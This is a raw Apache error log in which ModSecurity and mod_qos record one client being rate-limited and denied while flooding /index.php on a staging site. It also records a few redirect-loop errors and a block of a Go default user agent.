[Tue May 26 19:59:44.418722 2026] [security2:error] [pid 106517:tid 106655] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuV4ZZc2DoU1lPnP1SCgAAAIo"]
[Tue May 26 19:59:44.433889 2026] [security2:error] [pid 106517:tid 106687] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuV4ZZc2DoU1lPnP1SDgAAAKk"]
[Tue May 26 19:59:44.444417 2026] [security2:error] [pid 106517:tid 106740] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuV4ZZc2DoU1lPnP1SEwAAAN4"]
[Tue May 26 19:59:44.445643 2026] [security2:error] [pid 106517:tid 106694] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuV4ZZc2DoU1lPnP1SEAAAALA"]
[Tue May 26 19:59:44.552105 2026] [qos:error] [pid 106517:tid 106773] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuWIZZc2DoU1lPnP1STwAAAP8
[Tue May 26 19:59:44.552473 2026] [qos:error] [pid 106517:tid 106654] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuWIZZc2DoU1lPnP1SUAAAAIk
[Tue May 26 19:59:44.559819 2026] [qos:error] [pid 106517:tid 106675] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuWIZZc2DoU1lPnP1SVQAAAJ4
[Tue May 26 19:59:44.561498 2026] [qos:error] [pid 106517:tid 106772] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuWIZZc2DoU1lPnP1SVgAAAP4
[Tue May 26 19:59:44.568956 2026] [qos:error] [pid 93576:tid 93792] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWGDRMqfxdEDkosz1BgAAAFA
[Tue May 26 19:59:44.573413 2026] [qos:error] [pid 93868:tid 94326] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWEqK9k_ZUB2Vp25-tAAAAdM
[Tue May 26 19:59:44.575064 2026] [qos:error] [pid 93576:tid 93740] [client 45.148.10.120:35390] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWGDRMqfxdEDkosz1BwAAABw
[Tue May 26 19:59:44.588612 2026] [qos:error] [pid 93576:tid 93799] [client 45.148.10.120:35150] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWGDRMqfxdEDkosz1CAAAAFc
[Tue May 26 19:59:44.628297 2026] [qos:error] [pid 93576:tid 93780] [client 45.148.10.120:35172] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWGDRMqfxdEDkosz1CQAAAEQ
[Tue May 26 19:59:44.632324 2026] [qos:error] [pid 93576:tid 93736] [client 45.148.10.120:35372] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWGDRMqfxdEDkosz1CgAAABg
[Tue May 26 19:59:44.672843 2026] [core:error] [pid 106517:tid 106669] [client 16.148.188.168:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 19:59:44.672861 2026] [core:error] [pid 106517:tid 106669] [client 16.148.188.168:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 19:59:44.703706 2026] [qos:error] [pid 93868:tid 94282] [client 45.148.10.120:35250] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWEqK9k_ZUB2Vp25-tgAAAac
[Tue May 26 19:59:44.707371 2026] [qos:error] [pid 93868:tid 94348] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWEqK9k_ZUB2Vp25-twAAAek
[Tue May 26 19:59:44.710660 2026] [qos:error] [pid 93576:tid 93797] [client 45.148.10.120:35306] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWGDRMqfxdEDkosz1DAAAAFU
[Tue May 26 19:59:44.713161 2026] [qos:error] [pid 93868:tid 94318] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWEqK9k_ZUB2Vp25-uAAAAcs
[Tue May 26 19:59:44.721645 2026] [qos:error] [pid 93576:tid 93733] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWGDRMqfxdEDkosz1DQAAABU
[Tue May 26 19:59:44.726671 2026] [qos:error] [pid 93576:tid 93745] [client 45.148.10.120:35390] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWGDRMqfxdEDkosz1DgAAACE
[Tue May 26 19:59:44.728854 2026] [qos:error] [pid 93868:tid 94330] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWEqK9k_ZUB2Vp25-uQAAAdc
[Tue May 26 19:59:44.742549 2026] [qos:error] [pid 93576:tid 93763] [client 45.148.10.120:35150] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWGDRMqfxdEDkosz1DwAAADM
[Tue May 26 19:59:44.775516 2026] [qos:error] [pid 93576:tid 93757] [client 45.148.10.120:35172] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWGDRMqfxdEDkosz1EAAAAC0
[Tue May 26 19:59:44.780286 2026] [core:error] [pid 106517:tid 106745] [client 16.148.188.168:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 19:59:44.780319 2026] [core:error] [pid 106517:tid 106745] [client 16.148.188.168:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 19:59:44.783730 2026] [qos:error] [pid 93576:tid 93778] [client 45.148.10.120:35372] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWGDRMqfxdEDkosz1EQAAAEI
[Tue May 26 19:59:44.855613 2026] [qos:error] [pid 93868:tid 94307] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWEqK9k_ZUB2Vp25-vQAAAcA
[Tue May 26 19:59:44.855736 2026] [qos:error] [pid 93868:tid 94272] [client 45.148.10.120:35250] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuWEqK9k_ZUB2Vp25-vAAAAZ0
[Tue May 26 19:59:44.864277 2026] [qos:error] [pid 93576:tid 93726] [client 45.148.10.120:35306] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWGDRMqfxdEDkosz1EgAAAA4
[Tue May 26 19:59:44.865000 2026] [qos:error] [pid 93868:tid 94293] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWEqK9k_ZUB2Vp25-vgAAAbI
[Tue May 26 19:59:44.875716 2026] [qos:error] [pid 93576:tid 93837] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWGDRMqfxdEDkosz1EwAAAH0
[Tue May 26 19:59:44.879556 2026] [qos:error] [pid 93576:tid 93782] [client 45.148.10.120:35390] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWGDRMqfxdEDkosz1FAAAAEY
[Tue May 26 19:59:44.884443 2026] [qos:error] [pid 93868:tid 94316] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWEqK9k_ZUB2Vp25-vwAAAck
[Tue May 26 19:59:44.915572 2026] [qos:error] [pid 93576:tid 93793] [client 45.148.10.120:35150] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWGDRMqfxdEDkosz1FQAAAFE
[Tue May 26 19:59:44.923883 2026] [qos:error] [pid 93576:tid 93775] [client 45.148.10.120:35172] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWGDRMqfxdEDkosz1FgAAAD8
[Tue May 26 19:59:44.942935 2026] [qos:error] [pid 93576:tid 93807] [client 45.148.10.120:35372] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWGDRMqfxdEDkosz1FwAAAF8
[Tue May 26 19:59:45.076401 2026] [security2:error] [pid 106517:tid 106748] [client 103.163.220.42:52705] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/about.php"] [unique_id "ahWuWYZZc2DoU1lPnP1ScgAAAOY"]
[Tue May 26 19:59:45.192806 2026] [qos:error] [pid 93868:tid 94276] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWUqK9k_ZUB2Vp25-wgAAAaE
[Tue May 26 19:59:45.194367 2026] [qos:error] [pid 93868:tid 94306] [client 45.148.10.120:35250] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWUqK9k_ZUB2Vp25-wwAAAb8
[Tue May 26 19:59:45.198793 2026] [qos:error] [pid 93868:tid 94347] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWUqK9k_ZUB2Vp25-xAAAAeg
[Tue May 26 19:59:45.201332 2026] [qos:error] [pid 93576:tid 93788] [client 45.148.10.120:35306] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWWDRMqfxdEDkosz1GQAAAEw
[Tue May 26 19:59:45.202911 2026] [qos:error] [pid 93576:tid 93774] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWWDRMqfxdEDkosz1GgAAAD4
[Tue May 26 19:59:45.204852 2026] [qos:error] [pid 93576:tid 93783] [client 45.148.10.120:35390] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWWDRMqfxdEDkosz1GwAAAEc
[Tue May 26 19:59:45.205453 2026] [qos:error] [pid 93576:tid 93728] [client 45.148.10.120:35172] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWWDRMqfxdEDkosz1HAAAABA
[Tue May 26 19:59:45.207422 2026] [qos:error] [pid 93868:tid 94384] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWUqK9k_ZUB2Vp25-xQAAAg0
[Tue May 26 19:59:45.208935 2026] [qos:error] [pid 93576:tid 93838] [client 45.148.10.120:35150] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWWDRMqfxdEDkosz1HQAAAH4
[Tue May 26 19:59:45.211973 2026] [qos:error] [pid 93576:tid 93713] [client 45.148.10.120:35372] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWWDRMqfxdEDkosz1HgAAAAE
[Tue May 26 19:59:45.274138 2026] [security2:error] [pid 106517:tid 106657] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuV4ZZc2DoU1lPnP1SEgAAAIw"]
[Tue May 26 19:59:45.276576 2026] [security2:error] [pid 93868:tid 94354] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuV0qK9k_ZUB2Vp25-XgAAAe8"]
[Tue May 26 19:59:45.277102 2026] [security2:error] [pid 93576:tid 93749] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWGDRMqfxdEDkosz06gAAACU"]
[Tue May 26 19:59:45.277463 2026] [security2:error] [pid 106517:tid 106758] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuV4ZZc2DoU1lPnP1SFwAAAPA"]
[Tue May 26 19:59:45.283760 2026] [security2:error] [pid 93868:tid 94332] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuV0qK9k_ZUB2Vp25-YgAAAdk"]
[Tue May 26 19:59:45.297395 2026] [security2:error] [pid 106517:tid 106683] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuV4ZZc2DoU1lPnP1SFQAAAKU"]
[Tue May 26 19:59:45.314897 2026] [security2:error] [pid 93576:tid 93828] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuV2DRMqfxdEDkosz0ogAAAHQ"]
[Tue May 26 19:59:45.315379 2026] [security2:error] [pid 106517:tid 106716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuV4ZZc2DoU1lPnP1SFAAAAMY"]
[Tue May 26 19:59:45.317727 2026] [security2:error] [pid 106517:tid 106690] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuV4ZZc2DoU1lPnP1SHAAAAKw"]
[Tue May 26 19:59:45.319610 2026] [security2:error] [pid 93868:tid 94280] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuV0qK9k_ZUB2Vp25-bAAAAaU"]
[Tue May 26 19:59:45.323875 2026] [security2:error] [pid 106517:tid 106653] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuV4ZZc2DoU1lPnP1SEQAAAIg"]
[Tue May 26 19:59:45.331177 2026] [security2:error] [pid 106517:tid 106775] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuV4ZZc2DoU1lPnP1SFgAAAQE"]
[Tue May 26 19:59:45.332311 2026] [security2:error] [pid 106517:tid 106667] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuV4ZZc2DoU1lPnP1SIwAAAJY"]
[Tue May 26 19:59:45.332868 2026] [security2:error] [pid 93576:tid 93751] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuV2DRMqfxdEDkosz0pgAAACc"]
[Tue May 26 19:59:45.363687 2026] [security2:error] [pid 93868:tid 94285] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuV0qK9k_ZUB2Vp25-aAAAAao"]
[Tue May 26 19:59:45.364845 2026] [security2:error] [pid 93868:tid 94319] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWEqK9k_ZUB2Vp25-kgAAAcw"]
[Tue May 26 19:59:45.368885 2026] [security2:error] [pid 93576:tid 93744] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuV2DRMqfxdEDkosz0rgAAACA"]
[Tue May 26 19:59:45.373893 2026] [security2:error] [pid 93868:tid 94295] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWEqK9k_ZUB2Vp25-jgAAAbQ"]
[Tue May 26 19:59:45.395459 2026] [security2:error] [pid 93576:tid 93732] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuV2DRMqfxdEDkosz0qgAAABQ"]
[Tue May 26 19:59:45.398028 2026] [security2:error] [pid 93868:tid 94275] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWEqK9k_ZUB2Vp25-kwAAAaA"]
[Tue May 26 19:59:45.400920 2026] [security2:error] [pid 106517:tid 106706] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuV4ZZc2DoU1lPnP1SIAAAALw"]
[Tue May 26 19:59:45.407752 2026] [security2:error] [pid 93868:tid 94351] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWEqK9k_ZUB2Vp25-nAAAAew"]
[Tue May 26 19:59:45.422522 2026] [security2:error] [pid 106517:tid 106692] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuV4ZZc2DoU1lPnP1SHQAAAK4"]
[Tue May 26 19:59:45.435858 2026] [security2:error] [pid 93868:tid 94362] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWEqK9k_ZUB2Vp25-lAAAAfc"]
[Tue May 26 19:59:45.436861 2026] [security2:error] [pid 93576:tid 93712] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuV2DRMqfxdEDkosz0rAAAAAA"]
[Tue May 26 19:59:45.443515 2026] [security2:error] [pid 106517:tid 106674] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuV4ZZc2DoU1lPnP1SGQAAAJ0"]
[Tue May 26 19:59:45.450815 2026] [security2:error] [pid 93868:tid 94337] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWEqK9k_ZUB2Vp25-ngAAAd4"]
[Tue May 26 19:59:45.463856 2026] [security2:error] [pid 93868:tid 94303] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWEqK9k_ZUB2Vp25-pQAAAbw"]
[Tue May 26 19:59:45.464191 2026] [security2:error] [pid 106517:tid 106759] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWIZZc2DoU1lPnP1SPgAAAPE"]
[Tue May 26 19:59:45.464191 2026] [security2:error] [pid 93576:tid 93818] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWGDRMqfxdEDkosz06AAAAGo"]
[Tue May 26 19:59:45.465199 2026] [security2:error] [pid 106517:tid 106771] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWIZZc2DoU1lPnP1SMwAAAP0"]
[Tue May 26 19:59:45.465758 2026] [security2:error] [pid 93868:tid 94335] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWEqK9k_ZUB2Vp25-lwAAAdw"]
[Tue May 26 19:59:45.526600 2026] [security2:error] [pid 93868:tid 94264] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuWUqK9k_ZUB2Vp25-wQAAAZU"]
[Tue May 26 19:59:45.587756 2026] [qos:error] [pid 93868:tid 94261] [client 45.148.10.120:35116] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWUqK9k_ZUB2Vp25-_wAAAZI
[Tue May 26 19:59:45.588373 2026] [qos:error] [pid 93576:tid 93782] [client 45.148.10.120:35204] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWWDRMqfxdEDkosz1RgAAAEY
[Tue May 26 19:59:45.592770 2026] [qos:error] [pid 93576:tid 93793] [client 45.148.10.120:34960] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWWDRMqfxdEDkosz1RwAAAFE
[Tue May 26 19:59:45.612472 2026] [qos:error] [pid 93868:tid 94379] [client 45.148.10.120:35398] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWUqK9k_ZUB2Vp25_AAAAAgg
[Tue May 26 19:59:45.615913 2026] [qos:error] [pid 93868:tid 94353] [client 45.148.10.120:35284] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWUqK9k_ZUB2Vp25_AQAAAe4
[Tue May 26 19:59:45.616669 2026] [qos:error] [pid 93868:tid 94308] [client 45.148.10.120:35296] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWUqK9k_ZUB2Vp25_AgAAAcE
[Tue May 26 19:59:45.617011 2026] [qos:error] [pid 93576:tid 93807] [client 45.148.10.120:35356] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWWDRMqfxdEDkosz1SAAAAF8
[Tue May 26 19:59:45.620094 2026] [qos:error] [pid 93868:tid 94285] [client 45.148.10.120:34910] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWUqK9k_ZUB2Vp25_AwAAAao
[Tue May 26 19:59:45.620462 2026] [qos:error] [pid 93868:tid 94355] [client 45.148.10.120:34936] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWUqK9k_ZUB2Vp25_BAAAAfA
